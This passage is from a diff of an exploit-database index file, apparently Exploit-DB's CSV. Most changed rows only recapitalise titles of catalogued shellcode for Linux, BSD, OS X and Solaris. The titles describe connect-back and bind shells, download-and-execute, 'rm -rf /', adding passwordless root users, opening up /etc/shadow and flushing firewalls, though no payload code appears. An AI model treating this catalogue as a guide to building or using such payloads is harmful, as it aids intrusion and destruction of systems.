(45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0 +13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - Connect back (140.115.53.35:9999)_ download a file (cb) and execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0 +13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0 +13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - connect back (Port )8192.send.exit /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0 +13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - writes a php connectback shell (/var/www/cb.php) to the filesystem Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0 +13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / attempts to block the process from being stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0 +13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) . setgid(0) . aslr_off Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0 +13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - raw-socket ICMP/checksum shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0 +13344,platforms/lin_x86/shellcode/13344.c,"Linux/x86 - /sbin/iptables -F Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 +13345,platforms/lin_x86/shellcode/13345.c,"Linux/x86 - kill all processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 +13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0 +13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - set system time to 0 and exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add root user 'r00t' with no password to /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - forkbomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13353,platforms/lin_x86/shellcode/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 +13354,platforms/lin_x86/shellcode/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 +13355,platforms/lin_x86/shellcode/13355.c,"Linux/x86 - HTTP/1.x GET_ Downloads and execve() Shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode,0 +13356,platforms/lin_x86/shellcode/13356.c,"Linux/x86 - executes command after setreuid Shellcode (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode,0 +13357,platforms/lin_x86/shellcode/13357.c,"Linux/x86 - stdin re-open and /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 +13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - re-use of /bin/sh string in .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 +13359,platforms/lin_x86/shellcode/13359.c,"Linux/x86 - setuid(0) and /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 +13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - setuid/portbind (Port 31337) Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 +13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - portbind (2707) Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0 13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0 -13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() portbind 31337/TCP shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 +13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() portbind 31337/TCP Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 -13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0 +13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0 13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - xor-encoded Connect Back (127.0.0.1:80) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0 -13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + ZIP Header shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 -13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + RTF Header shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0 -13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + RIFF Header shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 -13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + Bitmap Header shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0 -13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - /tmp/swr to SWAP restore shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 -13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 +13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + ZIP Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + RTF Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + RIFF Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - /tmp/swr to SWAP restore Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 +13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Password Authentication portbind (64713) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 -13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - portbind (port 64713) shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 -13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13376,platforms/lin_x86/shellcode/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) shellcode (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13377,platforms/lin_x86/shellcode/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) shellcode (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13378,platforms/lin_x86/shellcode/13378.c,"Linux/x86 - setuid(0)_setgid(0) execve(/bin/sh_ [/bin/sh_ NULL]) shellcode (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads and JMP shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0 +13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - portbind (port 64713) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 +13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13376,platforms/lin_x86/shellcode/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13377,platforms/lin_x86/shellcode/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13378,platforms/lin_x86/shellcode/13378.c,"Linux/x86 - setuid(0)_setgid(0) execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads and JMP Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0 13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 -13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh anti-ids shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 -13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 -13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh shellcode (encoded by +1) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 -13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User 'xtz' without Password to /etc/passwd shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connect-back shellcode 127.0.0.1:31337/TCP (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13397,platforms/lin_x86/shellcode/13397.c,"Linux/x86 - reboot() shellcode (20 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) / PUSH shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13401,platforms/lin_x86/shellcode/13401.c,"Linux/x86 - Connect Back shellcode (90 bytes)",2005-12-28,xort,lin_x86,shellcode,0 -13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - socket-proxy shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0 -13403,platforms/lin_x86/shellcode/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13404,platforms/lin_x86/shellcode/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13405,platforms/lin_x86/shellcode/13405.c,"Linux/x86 - _exit(1); shellcode (7 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13406,platforms/lin_x86/shellcode/13406.c,"Linux/x86 - read(0_buf_2541); chmod(buf_4755); shellcode (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13407,platforms/lin_x86/shellcode/13407.c,"Linux/x86 - write(0__Hello core!\n__12); (with optional 7 byte exit) shellcode (36 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13408,platforms/lin_x86/shellcode/13408.c,"Linux/x86 - snoop /dev/dsp shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode,0 -13409,platforms/lin_x86/shellcode/13409.c,"Linux/x86 - /bin/sh Standard Opcode Array Payload shellcode (21 bytes)",2005-09-15,c0ntex,lin_x86,shellcode,0 -13410,platforms/lin_x86/shellcode/13410.s,"Linux/x86 - examples of long-term payloads hide-wait-change shellcode (.s) (187+ bytes)",2005-09-09,xort,lin_x86,shellcode,0 -13411,platforms/lin_x86/shellcode/13411.c,"Linux/x86 - examples of long-term payloads hide-wait-change shellcode (187+ bytes)",2005-09-08,xort,lin_x86,shellcode,0 -13412,platforms/lin_x86/shellcode/13412.c,"Linux/x86 - /bin/sh sysenter Opcode Array Payload shellcode (23 bytes)",2005-09-04,BaCkSpAcE,lin_x86,shellcode,0 -13413,platforms/lin_x86/shellcode/13413.c,"Linux/x86 - /bin/sh sysenter Opcode Array Payload shellcode (27 bytes)",2005-08-25,amnesia,lin_x86,shellcode,0 -13414,platforms/lin_x86/shellcode/13414.c,"Linux/x86 - /bin/sh sysenter Opcode Array Payload shellcode (45 bytes)",2005-08-19,c0ntex,lin_x86,shellcode,0 -13415,platforms/lin_x86/shellcode/13415.c,"Linux/x86 - chroot & standart shellcode (66 bytes)",2005-07-11,Okti,lin_x86,shellcode,0 -13416,platforms/lin_x86/shellcode/13416.txt,"Linux/x86 - upload & exec shellcode (189 bytes)",2005-06-19,cybertronic,lin_x86,shellcode,0 -13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid/execve shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0 -13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - alpha-numeric shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - alpha-numeric using IMUL Method shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self Modifying Code shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self Modifying Code shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0 -13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 -13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh alphanumeric shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 -13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0 -13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 -13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - portbind port 5074 toupper shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0 -13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add user 't00r' encrypt shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 -13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 -13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 -13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0 -13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - shared memory exec shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0 -13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - iptables -F shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0 -13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - iptables -F shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 -13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse telnet shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0 -13436,platforms/lin_x86/shellcode/13436.c,"Linux/x86 - connect shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0 -13437,platforms/lin_x86/shellcode/13437.c,"Linux/x86 - chmod 666 /etc/shadow shellcode (41 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 -13438,platforms/lin_x86/shellcode/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; chmod 4555 katy shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 -13439,platforms/lin_x86/shellcode/13439.c,"Linux/x86 - eject /dev/cdrom shellcode (64 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0 -13440,platforms/lin_x86/shellcode/13440.c,"Linux/x86 - xterm -ut -display [IP]:0 shellcode (132 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 -13441,platforms/lin_x86/shellcode/13441.c,"Linux/x86 - ipchains -F shellcode (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode,0 -13442,platforms/lin_x86/shellcode/13442.c,"Linux/x86 - chmod 666 /etc/shadow shellcode (82 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 -13443,platforms/lin_x86/shellcode/13443.c,"Linux/x86 - execve /bin/sh shellcode (29 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13444,platforms/lin_x86/shellcode/13444.c,"Linux/x86 - execve /bin/sh shellcode (24 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13445,platforms/lin_x86/shellcode/13445.c,"Linux/x86 - execve /bin/sh shellcode (38 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13446,platforms/lin_x86/shellcode/13446.c,"Linux/x86 - execve /bin/sh shellcode (30 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 -13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - portbind port 5074 shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - portbind port 5074 + fork() shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add user 't00r' shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add user shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0 -13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 -13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 -13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - break chroot execve /bin/sh shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0 -13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh encrypted shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh xor encrypted shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 -13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh tolower() evasion shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 -13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - execve of /bin/sh after setreuid(0_0) shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 -13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0 -13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh toupper() evasion shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0 -13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 -13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 -13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - bindshell port 4444 shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 -13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 -13465,platforms/multiple/shellcode/13465.c,"Linux PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) shellcode (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 -13466,platforms/multiple/shellcode/13466.c,"OS-X PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 -13467,platforms/multiple/shellcode/13467.c,"Linux/x86 & Unix/SPARC & IRIX/MIPS - execve /bin/sh shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode,0 -13468,platforms/multiple/shellcode/13468.c,"Linux/x86 & Unix/SPARC - execve /bin/sh shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0 -13469,platforms/multiple/shellcode/13469.c,"Linux/x86 & bsd/x86 - execve /bin/sh shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0 -13470,platforms/netbsd_x86/shellcode/13470.c,"NetBSD/x86 - kill all processes shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode,0 -13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - callback shellcode (port 6666) (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 -13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 -13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 -13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0 -13475,platforms/openbsd_x86/shellcode/13475.c,"OpenBSD/x86 - execve(/bin/sh) ( shellcode 23 bytes)",2006-05-01,hophet,openbsd_x86,shellcode,0 -13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - portbind port 6969 shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0 -13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add user _w00w00_ (112 shellcode bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0 -13478,platforms/osx_ppc/shellcode/13478.c,"OS-X/PPC - sync()_ reboot() shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 -13479,platforms/osx_ppc/shellcode/13479.c,"OS-X/PPC - execve(/bin/sh)_ exit() shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 -13480,platforms/osx_ppc/shellcode/13480.c,"OS-X/PPC - Add user _r00t_ shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13481,platforms/osx_ppc/shellcode/13481.c,"OS-X/PPC - execve /bin/sh shellcode (72 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13482,platforms/osx_ppc/shellcode/13482.c,"OS-X/PPC - Add inetd backdoor shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13483,platforms/osx_ppc/shellcode/13483.c,"OS-X/PPC - reboot shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13484,platforms/osx_ppc/shellcode/13484.c,"OS-X/PPC - setuid(0) + execve /bin/sh shellcode (88 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13485,platforms/osx_ppc/shellcode/13485.c,"OS-X/PPC - create /tmp/suid shellcode (122 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13486,platforms/osx_ppc/shellcode/13486.c,"OS-X/PPC - simple write() shellcode (75 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13487,platforms/osx_ppc/shellcode/13487.c,"OS-X/PPC - execve /usr/X11R6/bin/xterm shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 -13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - download and execute shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0 -13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - executes command after setreuid shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0 -13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - connect-back (with XNOR encoded session) shellcode (600 bytes)",2006-07-21,xort,solaris_sparc,shellcode,0 -13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid/execve shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 -13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - portbind (port 6666) shellcode (240 